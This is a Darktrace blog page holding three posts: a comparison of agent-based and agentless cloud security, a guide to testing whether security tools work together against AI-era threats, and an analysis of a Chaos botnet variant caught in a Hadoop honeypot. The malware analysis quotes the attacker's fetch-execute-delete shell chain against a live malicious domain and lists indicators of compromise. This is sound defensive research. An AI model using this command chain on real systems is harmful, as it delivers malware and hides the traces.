Blog
/
Cloud
/
January 13, 2025

Agent vs. Agentless Cloud Security: Why Deployment Methods Matter

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
13
Jan 2025

The rapid adoption of cloud technologies has brought significant security challenges for organizations of all sizes. According to recent studies, over 70% of enterprises now operate in hybrid or multi-cloud environments, with 93% employing a multi-cloud strategy[1]. This complexity requires robust security tools, but opinions vary on the best deployment method—agent-based, agentless, or a combination of both.

Agent-based and agentless cloud security approaches offer distinct benefits and limitations, and organizations often make deployment choices based on their unique needs depending on the function of the specific assets covered, the types of data stored, and cloud architecture, such as hybrid or multi-cloud deployments.

For example, agentless solutions are increasingly favored for their ease of deployment and ability to provide broad visibility across dynamic cloud environments. These are especially useful for DevOps teams, with 64% of organizations citing faster deployment as a key reason for adopting agentless tools[2].

On the other hand, agent-based solutions remain the preferred choice for environments requiring deep monitoring and granular control, such as securing sensitive high-value workloads in industries like finance and healthcare. In fact, over 50% of enterprises with critical infrastructure report relying on agent-based solutions for their advanced protection capabilities[3].

As the debate continues, many organizations are turning to combined approaches, leveraging the strengths of both agent-based and agentless tools to address the full spectrum of their security needs for comprehensive coverage. Understanding the capabilities and limitations of these methods is critical to building an effective cloud security strategy that adapts to evolving threats and complex infrastructures.

Agent-based cloud security

Agent-based security solutions involve deploying software agents on each device or system that needs protection. Agent-based solutions are great choices when you need in-depth monitoring and protection capabilities. They are ideal for organizations that require deep security controls and real-time active response, particularly in hybrid and on-premises environments.

Key advantages include:

1. Real-time monitoring and protection: Agents detect and block threats like malware, ransomware, and anomalous behaviors in real time, providing ongoing protection and enforcing compliance by continuously monitoring workload activities.  Agents enable full control over workloads for active response such as blocking IP addresses, killing processes, disabling accounts, and isolating infected systems from the network, stopping lateral movement.

2. Deep visibility for hybrid environments: Agent-based approaches allow for full visibility across on-premises, hybrid, and multi-cloud environments by deploying agents on physical and virtual machines. Agents offer detailed insights into system behavior, including processes, files, memory, network connections, and more, detecting subtle anomalies that might indicate security threats. Host-based monitoring tracks vulnerabilities at the system and application level, including unpatched software, rogue processes, and unauthorized network activity.

3. Comprehensive coverage: Agents are very effective in hybrid environments (cloud and on-premises), as they can be installed on both physical and virtual machines.  Agents can function independently on each host device onto which they are installed, which is especially helpful for endpoints that may operate outside of constant network connectivity.

Challenges:

1. Resource-intensive: Agents can consume CPU, memory, and network resources, which may affect performance, especially in environments with large numbers of workloads or ephemeral resources.

2. Challenging in dynamic environments: Managing hundreds or thousands of agents in highly dynamic or ephemeral environments (e.g., containers, serverless functions) can be complex and labor-intensive.

3. Slower deployment: Requires agent installation on each workload or instance, which can be time-consuming, particularly in large or complex environments.  

Agentless cloud security

Agentless security does not require software agents to be installed on each device. Instead, it uses cloud infrastructure and APIs to perform security checks. Agentless solutions are highly scalable with minimal impact on performance, and ideal for cloud-native and highly dynamic environments like serverless and containerized. These solutions are great choices for your cloud-native and multi-cloud environments where rapid deployment, scalability, and minimal impact on performance are critical, but response actions can be handled through external tools or manual processes.

Key advantages include:

1. Scalability and ease of deployment: Because agentless security doesn’t require installation on each individual device, it is much easier to deploy and can quickly scale across a vast number of cloud assets. This approach is ideal for environments where resources are frequently created and destroyed (e.g., serverless, containerized workloads), as there is no need for agent installation or maintenance.

2. Reduced system overhead: Without the need to run local agents, agentless security minimizes the impact on system performance. This is crucial in high-performance environments.

3. Broad visibility: Agentless security connects via API to cloud service providers, offering near-instant visibility and threat detection. It provides a comprehensive view of your cloud environment, making it easier to manage and secure large and complex infrastructures.

Challenges

1. Infrastructure-level monitoring: Agentless solutions rely on cloud service provider logs and API calls, meaning that detection might not be as immediate as agent-based solutions. They collect configuration data and logs, focusing on infrastructure misconfigurations, identity risks, exposed resources, and network traffic, but lack visibility and access to detailed, system-level information such as running processes and host-level vulnerabilities.

2. Cloud-focused: Primarily for cloud environments, although some tools may integrate with on-premises systems through API-based data gathering. For organizations with hybrid cloud environments, this approach fragments visibility and security, leading to blind spots and increasing security risk.

3. Passive remediation: Typically provides alerts and recommendations, but lacks deep control over workloads, requiring manual intervention or orchestration tools (e.g., SOAR platforms) to execute responses. Some agentless tools trigger automated responses via cloud provider APIs (e.g., revoking permissions, adjusting security groups), but with limited scope.

Combined agent-based and agentless approaches

A combined approach leverages the strengths of both agent-based and agentless security for complete coverage. This hybrid strategy helps security teams achieve comprehensive coverage by:

  • Using agent-based solutions for deep, real-time protection and detailed monitoring of critical systems or sensitive workloads.
  • Employing agentless solutions for fast deployment, broader visibility, and easier scalability across all cloud assets, which is particularly useful in dynamic cloud environments where workloads frequently change.

The combined approach has distinct practical applications. For example, imagine a financial services company that deals with sensitive transactions. Its security team might use agent-based security for critical databases to ensure stringent protections are in place. Meanwhile, agentless solutions could be ideal for less critical, transient workloads in the cloud, where rapid scalability and minimal performance impact are priorities. With different data types and infrastructures, the combined approach is best.

Best of both worlds: The benefits of a combined approach

The combined approach not only maximizes security efficacy but also aligns with diverse operational needs. This means that all parts of the cloud environment are secured according to their risk profile and functional requirements. Agent-based deployment provides in-depth monitoring and active protection against threats, suitable for environments requiring tight security controls, such as financial services or healthcare data processing systems. Agentless deployment complements agents by offering broader visibility and easier scalability across diverse and dynamic cloud environments, ideal for rapidly changing cloud resources.

There are three major benefits from combining agent-based and agentless approaches.

1. Building a holistic security posture: By integrating both agent-based and agentless technologies, organizations can ensure that all parts of their cloud environments are covered—from persistent, high-risk endpoints to transient cloud resources. This comprehensive coverage is crucial for detecting and responding to threats promptly and effectively.

2. Reducing overhead while boosting scalability: Agentless systems require no software installation on each device, reducing overhead and eliminating the need to update and maintain agents on a large number of endpoints. This makes it easier to scale security as the organization grows or as the cloud environment changes.

3. Applying targeted protection where needed: Agent-based solutions can be deployed on selected assets that handle sensitive information or are critical to business operations, thus providing focused protection without incurring the costs and complexity of universal deployment.

Use cases for a combined approach

A combined approach gives security teams the flexibility to deploy agent-based and agentless solutions based on the specific security requirements of different assets and environments. As a result, organizations can optimize their security expenditures and operational efforts, allowing for greater adaptability in cloud security use cases.

Let’s take a look at how this could practically play out. In the combined approach, agent-based security can perform the following:

1. Deep monitoring and real-time protection:

  • Workload threat detection: Agent-based solutions monitor individual workloads for suspicious activity, such as unauthorized file changes or unusual resource usage, providing high granularity for detecting threats within critical cloud applications.
  • Behavioral analysis of applications: By deploying agents on virtual machines or containers, organizations can monitor behavior patterns and flag anomalies indicative of insider threats, lateral movement, or Advanced Persistent Threats (APTs).
  • Protecting high-sensitivity environments: Agents provide continuous monitoring and advanced threat protection for environments processing sensitive data, such as payment processing systems or healthcare records, leveraging capabilities like memory protection and file integrity monitoring.

2. Cloud asset protection:

  • Securing critical infrastructure: Agent-based deployments are ideal for assets like databases or storage systems that require real-time defense against exploits and ransomware.
  • Advanced packet inspection: For high-value assets, agents offer deep packet inspection and in-depth logging to detect stealthy attacks such as data exfiltration.
  • Customizable threat response: Agents allow for tailored security rules and automated responses at the workload level, such as shutting down compromised instances or quarantining infected files.

At the same time, agentless cloud security provides complementary benefits such as:

1. Broad visibility and compliance:

  • Asset discovery and management: Agentless systems can quickly scan the entire cloud environment to identify and inventory all assets, a crucial capability for maintaining compliance with regulations like GDPR or HIPAA, which require up-to-date records of data locations and usage.
  • Regulatory compliance auditing and configuration management: Quickly identify gaps in compliance frameworks like PCI DSS or SOC 2 by scanning configurations, permissions, and audit trails without installing agents. Using APIs to check configurations across cloud services ensures that all instances comply with organizational and regulatory standards, an essential aspect for maintaining security hygiene and compliance.
  • Shadow IT Detection: Detect and map unauthorized cloud services or assets that are spun up without security oversight, ensuring full inventory coverage.

2. Rapid environmental assessment:

  • Vulnerability assessment of new deployments: In environments where new code is frequently deployed, agentless security can quickly assess new instances, containers, or workloads in CI/CD pipelines for vulnerabilities and misconfigurations, enabling secure deployments at DevOps speed.
  • Misconfiguration alerts: Detect and alert on common cloud configuration issues, such as exposed storage buckets or overly permissive IAM roles, across cloud providers like AWS, Azure, and GCP.
  • Policy enforcement: Validate that new resources adhere to established security baselines and organizational policies, preventing security drift during rapid cloud scaling.

Combining agent-based and agentless approaches in cloud security not only maximizes the protective capabilities, but also offers flexibility, efficiency, and comprehensive coverage tailored to the diverse and evolving needs of modern cloud environments. This integrated strategy ensures that organizations can protect their assets more effectively while also adapting quickly to new threats and regulatory requirements.

Darktrace offers complementary and flexible deployment options for holistic cloud security

Powered by multilayered AI, Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that is agentless by default, with optional lightweight, host-based server agents for enhanced real-time actioning and deep inspection. As such, it can deploy in cloud environments in minutes and provide unified visibility and security across hybrid, multi-cloud environments.

With any deployment method, Darktrace supports multi-tenant, hybrid, and serverless cloud environments. Its Self-Learning AI learns the normal behavior across architectures, assets, and users to identify unusual activity that may indicate a threat. With this approach, Darktrace / CLOUD quickly disarms threats, whether they are known, unknown, or completely novel. It then accelerates the investigation process and responds to threats at machine speed.

Learn more about how Darktrace / CLOUD secures multi and hybrid cloud environments in the Solution Brief.

References:

1. Flexera 2023 State of the Cloud Report

2. ESG Research 2023 Report on Cloud-Native Security

3. Gartner, Market Guide for Cloud Workload Protection Platforms, 2023

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security

More in this series

No items found.

Blog

/

AI

/

April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations

secuing AI testing gaps security operationsDefault blog imageDefault blog image

What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by signing up for our newsletter where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email—so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)  
  1. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures—reducing dwell time in fast exploitation windows.  
  1. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows—buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)  
  1. Investigation workflows that assume AI is in the loop—for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  1. Who did it?
  1. Why did they do it?
  1. How did they do it?
  1. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Security markets tend to follow a familiar pattern. New technologies drive an initial wave of specialized tools (posture, governance, observability) each focused on a specific part of the problem. Over time, those capabilities consolidate as organizations realize the new challenge is coordination.

AI is accelerating the shift of focus to coordination because AI-powered attackers can move faster and operate across more systems at once. Recent exploitation waves show exactly this. Adversaries can operationalize new techniques and move across domains, turning small gaps into full attack paths.

Anticipate a continued move toward more integrated security models because fragmented approaches can’t keep up with the speed and interconnected nature of modern attacks.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  1. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  1. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  1. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  1. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  1. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, behaving “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  1. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.

Final takeaway

Security teams should ask be focused on how their stack operates as one system before AI amplifies pressure on every seam.

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

Continue reading
About the author
Nabil Zoldjalali
VP, Field CISO

Blog

/

/

April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud

Chaos Malware Variant Exploiting Misconfigurations in the CloudDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One example of software targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one example from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is a Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers and primarily spreads through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then utilizes infected devices as part of a Distributed Denial-of-Service (DDoS) botnet, as well as cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

The initial infection being delivered to the unsecured endpoint.
Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - sets permissions to allow all users to read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0. - executes the malware
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.

In practice, once this application is created an attacker-defined binary is downloaded from their server, executed on the system, and then removed to prevent forensic recovery. The domain pan.tenire[.]com has been previously observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resume themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, while the majority of router hardware typically runs on ARM, MIPS, or PowerPC architecture and often 32-bit.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

The creation of the systemd persistence service.
Figure 2: The creation of the systemd persistence service.

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy. This enables the attacker to route their traffic via the compromised server and use it as a proxy. This capability offers several advantages: it enables the threat actor to launch attacks from the victim’s internet connection, making the activity appear to originate from the victim instead of the attacker, and it allows the attacker to pivot into internal networks only accessible from the compromised server.

The command processor for StartProxy. Due to endianness, the string is reversed.
Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server.  At time or writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global which is geolocated at Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies enable attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI